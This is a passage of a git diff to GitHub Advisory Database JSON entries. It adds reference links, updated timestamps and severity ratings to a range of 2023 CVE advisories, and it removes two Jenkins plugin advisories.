"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23847" - }, - { - "type": "WEB", - "url": "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-Multiple-CVEs-affecting-Coverity-Jenkins-Plugin" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2793%20(2)" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-02-15T19:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/02/GHSA-wrh4-6832-wg62/GHSA-wrh4-6832-wg62.json b/advisories/unreviewed/2023/02/GHSA-wrh4-6832-wg62/GHSA-wrh4-6832-wg62.json index 53ef55f3757ba..2cfc95a3eda22 100644 --- a/advisories/unreviewed/2023/02/GHSA-wrh4-6832-wg62/GHSA-wrh4-6832-wg62.json +++ b/advisories/unreviewed/2023/02/GHSA-wrh4-6832-wg62/GHSA-wrh4-6832-wg62.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176983/WordPress-Simple-URLs-Cross-Site-Scripting.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/03/GHSA-77f3-6546-6rj7/GHSA-77f3-6546-6rj7.json b/advisories/unreviewed/2023/03/GHSA-77f3-6546-6rj7/GHSA-77f3-6546-6rj7.json index 877b36c1f65ca..1b49721f3be10 100644 --- a/advisories/unreviewed/2023/03/GHSA-77f3-6546-6rj7/GHSA-77f3-6546-6rj7.json +++ b/advisories/unreviewed/2023/03/GHSA-77f3-6546-6rj7/GHSA-77f3-6546-6rj7.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230414-0001/" diff --git a/advisories/unreviewed/2023/03/GHSA-f5x9-rprw-5rc4/GHSA-f5x9-rprw-5rc4.json b/advisories/unreviewed/2023/03/GHSA-f5x9-rprw-5rc4/GHSA-f5x9-rprw-5rc4.json index 3d53aba5ed77c..e347b113f1aed 100644 --- a/advisories/unreviewed/2023/03/GHSA-f5x9-rprw-5rc4/GHSA-f5x9-rprw-5rc4.json +++ b/advisories/unreviewed/2023/03/GHSA-f5x9-rprw-5rc4/GHSA-f5x9-rprw-5rc4.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APBMS2Q6746AXAFAITNJMGBNFGNMVLWR/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5378" diff --git a/advisories/unreviewed/2023/03/GHSA-jc55-2gxv-h2fp/GHSA-jc55-2gxv-h2fp.json b/advisories/unreviewed/2023/03/GHSA-jc55-2gxv-h2fp/GHSA-jc55-2gxv-h2fp.json index 61ba98db9862b..5b8985785a0a5 100644 --- a/advisories/unreviewed/2023/03/GHSA-jc55-2gxv-h2fp/GHSA-jc55-2gxv-h2fp.json +++ b/advisories/unreviewed/2023/03/GHSA-jc55-2gxv-h2fp/GHSA-jc55-2gxv-h2fp.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_13" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00002.html" + }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202309-12" diff --git a/advisories/unreviewed/2023/03/GHSA-jg93-x3r7-r8pf/GHSA-jg93-x3r7-r8pf.json b/advisories/unreviewed/2023/03/GHSA-jg93-x3r7-r8pf/GHSA-jg93-x3r7-r8pf.json index d79976dddd260..ea2f333279f85 100644 --- a/advisories/unreviewed/2023/03/GHSA-jg93-x3r7-r8pf/GHSA-jg93-x3r7-r8pf.json +++ b/advisories/unreviewed/2023/03/GHSA-jg93-x3r7-r8pf/GHSA-jg93-x3r7-r8pf.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APBMS2Q6746AXAFAITNJMGBNFGNMVLWR/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5378" diff --git a/advisories/unreviewed/2023/03/GHSA-pr34-r4f9-f5c6/GHSA-pr34-r4f9-f5c6.json b/advisories/unreviewed/2023/03/GHSA-pr34-r4f9-f5c6/GHSA-pr34-r4f9-f5c6.json index 1fbd95508c09b..380ad5ceda30a 100644 --- a/advisories/unreviewed/2023/03/GHSA-pr34-r4f9-f5c6/GHSA-pr34-r4f9-f5c6.json +++ b/advisories/unreviewed/2023/03/GHSA-pr34-r4f9-f5c6/GHSA-pr34-r4f9-f5c6.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_13" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00002.html" + }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202309-12" diff --git a/advisories/unreviewed/2023/03/GHSA-pxvj-4wx4-gv6w/GHSA-pxvj-4wx4-gv6w.json b/advisories/unreviewed/2023/03/GHSA-pxvj-4wx4-gv6w/GHSA-pxvj-4wx4-gv6w.json index 3ba08b94585b3..2b6ad5a9b29ae 100644 --- a/advisories/unreviewed/2023/03/GHSA-pxvj-4wx4-gv6w/GHSA-pxvj-4wx4-gv6w.json +++ b/advisories/unreviewed/2023/03/GHSA-pxvj-4wx4-gv6w/GHSA-pxvj-4wx4-gv6w.json @@ -37,6 +37,14 @@ "type": "WEB", "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230414-0001/" @@ -48,6 +56,10 @@ { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230328.txt" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/28/4" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/03/GHSA-v57p-c5gg-pq5v/GHSA-v57p-c5gg-pq5v.json b/advisories/unreviewed/2023/03/GHSA-v57p-c5gg-pq5v/GHSA-v57p-c5gg-pq5v.json index 109275a236285..eaa3d16c223e4 100644 --- a/advisories/unreviewed/2023/03/GHSA-v57p-c5gg-pq5v/GHSA-v57p-c5gg-pq5v.json +++ b/advisories/unreviewed/2023/03/GHSA-v57p-c5gg-pq5v/GHSA-v57p-c5gg-pq5v.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APBMS2Q6746AXAFAITNJMGBNFGNMVLWR/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5378" diff --git a/advisories/unreviewed/2023/03/GHSA-vgj2-gwrp-65hq/GHSA-vgj2-gwrp-65hq.json b/advisories/unreviewed/2023/03/GHSA-vgj2-gwrp-65hq/GHSA-vgj2-gwrp-65hq.json index b8bfb8b5e74f2..68f4c144dd323 100644 --- a/advisories/unreviewed/2023/03/GHSA-vgj2-gwrp-65hq/GHSA-vgj2-gwrp-65hq.json +++ b/advisories/unreviewed/2023/03/GHSA-vgj2-gwrp-65hq/GHSA-vgj2-gwrp-65hq.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APBMS2Q6746AXAFAITNJMGBNFGNMVLWR/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5378" diff --git a/advisories/unreviewed/2023/03/GHSA-vxpc-466w-pjjv/GHSA-vxpc-466w-pjjv.json b/advisories/unreviewed/2023/03/GHSA-vxpc-466w-pjjv/GHSA-vxpc-466w-pjjv.json index 9a335f459fe2a..3bfffdc63e62a 100644 --- a/advisories/unreviewed/2023/03/GHSA-vxpc-466w-pjjv/GHSA-vxpc-466w-pjjv.json +++ b/advisories/unreviewed/2023/03/GHSA-vxpc-466w-pjjv/GHSA-vxpc-466w-pjjv.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27672" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.amd.com/en/corporate/product-security/bulletin/AMD-SB-1045" diff --git a/advisories/unreviewed/2023/03/GHSA-w2w6-xp88-5cvw/GHSA-w2w6-xp88-5cvw.json b/advisories/unreviewed/2023/03/GHSA-w2w6-xp88-5cvw/GHSA-w2w6-xp88-5cvw.json index 03b242c8afe53..efd8b83834392 100644 --- a/advisories/unreviewed/2023/03/GHSA-w2w6-xp88-5cvw/GHSA-w2w6-xp88-5cvw.json +++ b/advisories/unreviewed/2023/03/GHSA-w2w6-xp88-5cvw/GHSA-w2w6-xp88-5cvw.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.couchbase.com/alerts/" diff --git a/advisories/unreviewed/2023/04/GHSA-354q-38f3-jh4j/GHSA-354q-38f3-jh4j.json b/advisories/unreviewed/2023/04/GHSA-354q-38f3-jh4j/GHSA-354q-38f3-jh4j.json index e4fb2172bdec8..a187e230752dc 100644 --- a/advisories/unreviewed/2023/04/GHSA-354q-38f3-jh4j/GHSA-354q-38f3-jh4j.json +++ b/advisories/unreviewed/2023/04/GHSA-354q-38f3-jh4j/GHSA-354q-38f3-jh4j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-354q-38f3-jh4j", - "modified": "2023-05-05T15:30:59Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-04-25T21:30:29Z", "aliases": [ "CVE-2023-2269" @@ -29,6 +29,18 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/63AJUCJTZCII2JMAF7MGZEM66KY7IALT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FBLBKW2WM5YSTS6OGEU5SYHXSJ5EWSTV/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IXHBLWYNSUBS77TYPOJTADPDXKBH2F4U/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/63AJUCJTZCII2JMAF7MGZEM66KY7IALT/" @@ -41,6 +53,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IXHBLWYNSUBS77TYPOJTADPDXKBH2F4U/" }, + { + "type": "WEB", + "url": "https://lore.kernel.org/lkml/ZD1xyZxb3rHot8PV%40redhat.com/t/" + }, { "type": "WEB", "url": "https://lore.kernel.org/lkml/ZD1xyZxb3rHot8PV@redhat.com/t/" @@ -63,7 +79,7 @@ "CWE-413", "CWE-667" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-04-25T21:15:10Z" diff --git a/advisories/unreviewed/2023/04/GHSA-7cv2-wjgm-j7rm/GHSA-7cv2-wjgm-j7rm.json b/advisories/unreviewed/2023/04/GHSA-7cv2-wjgm-j7rm/GHSA-7cv2-wjgm-j7rm.json index 305b8bc5b8381..3950040803c2f 100644 --- a/advisories/unreviewed/2023/04/GHSA-7cv2-wjgm-j7rm/GHSA-7cv2-wjgm-j7rm.json +++ b/advisories/unreviewed/2023/04/GHSA-7cv2-wjgm-j7rm/GHSA-7cv2-wjgm-j7rm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7cv2-wjgm-j7rm", - "modified": "2023-05-03T21:30:17Z", + "modified": "2024-02-01T18:31:06Z", "published": "2023-04-24T21:30:30Z", "aliases": [ "CVE-2023-28484" @@ -36,13 +36,17 @@ { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230601-0006/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0005/" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-04-24T21:15:09Z" diff --git a/advisories/unreviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json b/advisories/unreviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json deleted file mode 100644 index e993fa7abbe89..0000000000000 --- a/advisories/unreviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7gqc-q9mc-6348", - "modified": "2023-04-21T18:30:23Z", - "published": "2023-04-12T18:30:35Z", - "aliases": [ - "CVE-2023-30532" - ], - "details": "A missing permission check in Jenkins TurboScript Plugin 1.3 and earlier allows attackers with Item/Read permission to trigger builds of jobs corresponding to the attacker-specified repository.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30532" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-04-12/#SECURITY-2851" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/04/13/3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-04-12T18:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/04/GHSA-cpmq-crvm-2w5p/GHSA-cpmq-crvm-2w5p.json b/advisories/unreviewed/2023/04/GHSA-cpmq-crvm-2w5p/GHSA-cpmq-crvm-2w5p.json index 28a5c88d9e3cb..15f624b190806 100644 --- a/advisories/unreviewed/2023/04/GHSA-cpmq-crvm-2w5p/GHSA-cpmq-crvm-2w5p.json +++ b/advisories/unreviewed/2023/04/GHSA-cpmq-crvm-2w5p/GHSA-cpmq-crvm-2w5p.json @@ -33,6 +33,18 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00020.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3HU4PKLUVB5CTMOVQ2GV33TNUNMJCBGD/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BBXEXL2ZQBWCBLNUP6P67FHECXQWSK3L/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GM66PNHGCXZU66LQCTP2FSJLFF6CVMSI/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3HU4PKLUVB5CTMOVQ2GV33TNUNMJCBGD/" diff --git a/advisories/unreviewed/2023/04/GHSA-g7cg-jg33-rrhv/GHSA-g7cg-jg33-rrhv.json b/advisories/unreviewed/2023/04/GHSA-g7cg-jg33-rrhv/GHSA-g7cg-jg33-rrhv.json index d1aece98ab2a5..c6d59d09c5780 100644 --- a/advisories/unreviewed/2023/04/GHSA-g7cg-jg33-rrhv/GHSA-g7cg-jg33-rrhv.json +++ b/advisories/unreviewed/2023/04/GHSA-g7cg-jg33-rrhv/GHSA-g7cg-jg33-rrhv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g7cg-jg33-rrhv", - "modified": "2023-04-26T21:30:37Z", + "modified": "2024-02-01T15:30:24Z", "published": "2023-04-26T21:30:37Z", "aliases": [ "CVE-2023-27559" @@ -28,13 +28,21 @@ { "type": "WEB", "url": "https://https://www.ibm.com/support/pages/node/6985667" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20230511-0010/" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/6985667" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-04-26T20:15:09Z" diff --git a/advisories/unreviewed/2023/04/GHSA-pwx9-2gvj-242v/GHSA-pwx9-2gvj-242v.json b/advisories/unreviewed/2023/04/GHSA-pwx9-2gvj-242v/GHSA-pwx9-2gvj-242v.json index 69254b2ee4ea9..9a5daff0af765 100644 --- a/advisories/unreviewed/2023/04/GHSA-pwx9-2gvj-242v/GHSA-pwx9-2gvj-242v.json +++ b/advisories/unreviewed/2023/04/GHSA-pwx9-2gvj-242v/GHSA-pwx9-2gvj-242v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pwx9-2gvj-242v", - "modified": "2023-05-04T18:30:51Z", + "modified": "2024-02-04T09:30:40Z", "published": "2023-04-25T15:30:27Z", "aliases": [ "CVE-2022-42335" @@ -21,10 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42335" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PSPFWSY6UOPGMADQGOGN2PAAS5LJRPTG/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PSPFWSY6UOPGMADQGOGN2PAAS5LJRPTG/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://xenbits.xenproject.org/xsa/advisory-430.txt" @@ -42,7 +50,7 @@ "cwe_ids": [ "CWE-476" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-04-25T13:15:09Z" diff --git a/advisories/unreviewed/2023/04/GHSA-vh2x-5rx6-qqhv/GHSA-vh2x-5rx6-qqhv.json b/advisories/unreviewed/2023/04/GHSA-vh2x-5rx6-qqhv/GHSA-vh2x-5rx6-qqhv.json index 518b83582b98b..42a1b2637e313 100644 --- a/advisories/unreviewed/2023/04/GHSA-vh2x-5rx6-qqhv/GHSA-vh2x-5rx6-qqhv.json +++ b/advisories/unreviewed/2023/04/GHSA-vh2x-5rx6-qqhv/GHSA-vh2x-5rx6-qqhv.json @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00004.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230517-0009/" diff --git a/advisories/unreviewed/2023/05/GHSA-28m3-c955-h29j/GHSA-28m3-c955-h29j.json b/advisories/unreviewed/2023/05/GHSA-28m3-c955-h29j/GHSA-28m3-c955-h29j.json index e71eb9b99cc59..f55f960b0b76a 100644 --- a/advisories/unreviewed/2023/05/GHSA-28m3-c955-h29j/GHSA-28m3-c955-h29j.json +++ b/advisories/unreviewed/2023/05/GHSA-28m3-c955-h29j/GHSA-28m3-c955-h29j.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-36cr-wp3c-5h2p/GHSA-36cr-wp3c-5h2p.json b/advisories/unreviewed/2023/05/GHSA-36cr-wp3c-5h2p/GHSA-36cr-wp3c-5h2p.json index da696343f1e69..9db4409793b6b 100644 --- a/advisories/unreviewed/2023/05/GHSA-36cr-wp3c-5h2p/GHSA-36cr-wp3c-5h2p.json +++ b/advisories/unreviewed/2023/05/GHSA-36cr-wp3c-5h2p/GHSA-36cr-wp3c-5h2p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-36cr-wp3c-5h2p", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33793" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-3777-fm87-36r8/GHSA-3777-fm87-36r8.json b/advisories/unreviewed/2023/05/GHSA-3777-fm87-36r8/GHSA-3777-fm87-36r8.json index 82fd003382ec2..f2f57d86b7206 100644 --- a/advisories/unreviewed/2023/05/GHSA-3777-fm87-36r8/GHSA-3777-fm87-36r8.json +++ b/advisories/unreviewed/2023/05/GHSA-3777-fm87-36r8/GHSA-3777-fm87-36r8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3777-fm87-36r8", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33788" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-44xq-533g-gj79/GHSA-44xq-533g-gj79.json b/advisories/unreviewed/2023/05/GHSA-44xq-533g-gj79/GHSA-44xq-533g-gj79.json index a880cd023dfa3..2a476f44b3b48 100644 --- a/advisories/unreviewed/2023/05/GHSA-44xq-533g-gj79/GHSA-44xq-533g-gj79.json +++ b/advisories/unreviewed/2023/05/GHSA-44xq-533g-gj79/GHSA-44xq-533g-gj79.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-4w75-4x78-6882/GHSA-4w75-4x78-6882.json b/advisories/unreviewed/2023/05/GHSA-4w75-4x78-6882/GHSA-4w75-4x78-6882.json index 11c6635fcf2bd..c184f08f4f98c 100644 --- a/advisories/unreviewed/2023/05/GHSA-4w75-4x78-6882/GHSA-4w75-4x78-6882.json +++ b/advisories/unreviewed/2023/05/GHSA-4w75-4x78-6882/GHSA-4w75-4x78-6882.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4w75-4x78-6882", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33791" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-53r9-cff5-x7hq/GHSA-53r9-cff5-x7hq.json b/advisories/unreviewed/2023/05/GHSA-53r9-cff5-x7hq/GHSA-53r9-cff5-x7hq.json index b45b7342812a0..e9466bde8f663 100644 --- a/advisories/unreviewed/2023/05/GHSA-53r9-cff5-x7hq/GHSA-53r9-cff5-x7hq.json +++ b/advisories/unreviewed/2023/05/GHSA-53r9-cff5-x7hq/GHSA-53r9-cff5-x7hq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-53r9-cff5-x7hq", - "modified": "2023-05-05T09:30:15Z", + "modified": "2024-02-02T18:30:23Z", "published": "2023-05-05T09:30:15Z", "aliases": [ "CVE-2023-28068" @@ -28,9 +28,10 @@ ], "database_specific": { "cwe_ids": [ - "CWE-284" + "CWE-284", + "CWE-732" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-05T07:15:08Z" diff --git a/advisories/unreviewed/2023/05/GHSA-5ccq-3h49-vjp2/GHSA-5ccq-3h49-vjp2.json b/advisories/unreviewed/2023/05/GHSA-5ccq-3h49-vjp2/GHSA-5ccq-3h49-vjp2.json index 234612d739def..af8906bfba7cc 100644 --- a/advisories/unreviewed/2023/05/GHSA-5ccq-3h49-vjp2/GHSA-5ccq-3h49-vjp2.json +++ b/advisories/unreviewed/2023/05/GHSA-5ccq-3h49-vjp2/GHSA-5ccq-3h49-vjp2.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-72w4-56w3-7485/GHSA-72w4-56w3-7485.json b/advisories/unreviewed/2023/05/GHSA-72w4-56w3-7485/GHSA-72w4-56w3-7485.json index bb1d35995552f..831fab0f27d6e 100644 --- a/advisories/unreviewed/2023/05/GHSA-72w4-56w3-7485/GHSA-72w4-56w3-7485.json +++ b/advisories/unreviewed/2023/05/GHSA-72w4-56w3-7485/GHSA-72w4-56w3-7485.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-72w4-56w3-7485", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:27Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33786" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-7g49-wq8x-r6rh/GHSA-7g49-wq8x-r6rh.json b/advisories/unreviewed/2023/05/GHSA-7g49-wq8x-r6rh/GHSA-7g49-wq8x-r6rh.json index 7304ea11b5235..9c7b5800518a5 100644 --- a/advisories/unreviewed/2023/05/GHSA-7g49-wq8x-r6rh/GHSA-7g49-wq8x-r6rh.json +++ b/advisories/unreviewed/2023/05/GHSA-7g49-wq8x-r6rh/GHSA-7g49-wq8x-r6rh.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-7jf7-rx7v-xwqq/GHSA-7jf7-rx7v-xwqq.json b/advisories/unreviewed/2023/05/GHSA-7jf7-rx7v-xwqq/GHSA-7jf7-rx7v-xwqq.json index 1358416b70619..714a67f6f9225 100644 --- a/advisories/unreviewed/2023/05/GHSA-7jf7-rx7v-xwqq/GHSA-7jf7-rx7v-xwqq.json +++ b/advisories/unreviewed/2023/05/GHSA-7jf7-rx7v-xwqq/GHSA-7jf7-rx7v-xwqq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7jf7-rx7v-xwqq", - "modified": "2023-05-16T18:30:15Z", + "modified": "2024-02-03T03:30:27Z", "published": "2023-05-10T00:30:16Z", "aliases": [ "CVE-2023-2156" @@ -66,7 +66,7 @@ "cwe_ids": [ "CWE-617" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-09T22:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-8w3x-9pj3-2gw8/GHSA-8w3x-9pj3-2gw8.json b/advisories/unreviewed/2023/05/GHSA-8w3x-9pj3-2gw8/GHSA-8w3x-9pj3-2gw8.json index d62735ea8b969..bc71e641337cc 100644 --- a/advisories/unreviewed/2023/05/GHSA-8w3x-9pj3-2gw8/GHSA-8w3x-9pj3-2gw8.json +++ b/advisories/unreviewed/2023/05/GHSA-8w3x-9pj3-2gw8/GHSA-8w3x-9pj3-2gw8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8w3x-9pj3-2gw8", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:27Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33787" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-94hm-2957-3gcc/GHSA-94hm-2957-3gcc.json b/advisories/unreviewed/2023/05/GHSA-94hm-2957-3gcc/GHSA-94hm-2957-3gcc.json index 2999d3bfbcd48..f7f991215b02d 100644 --- 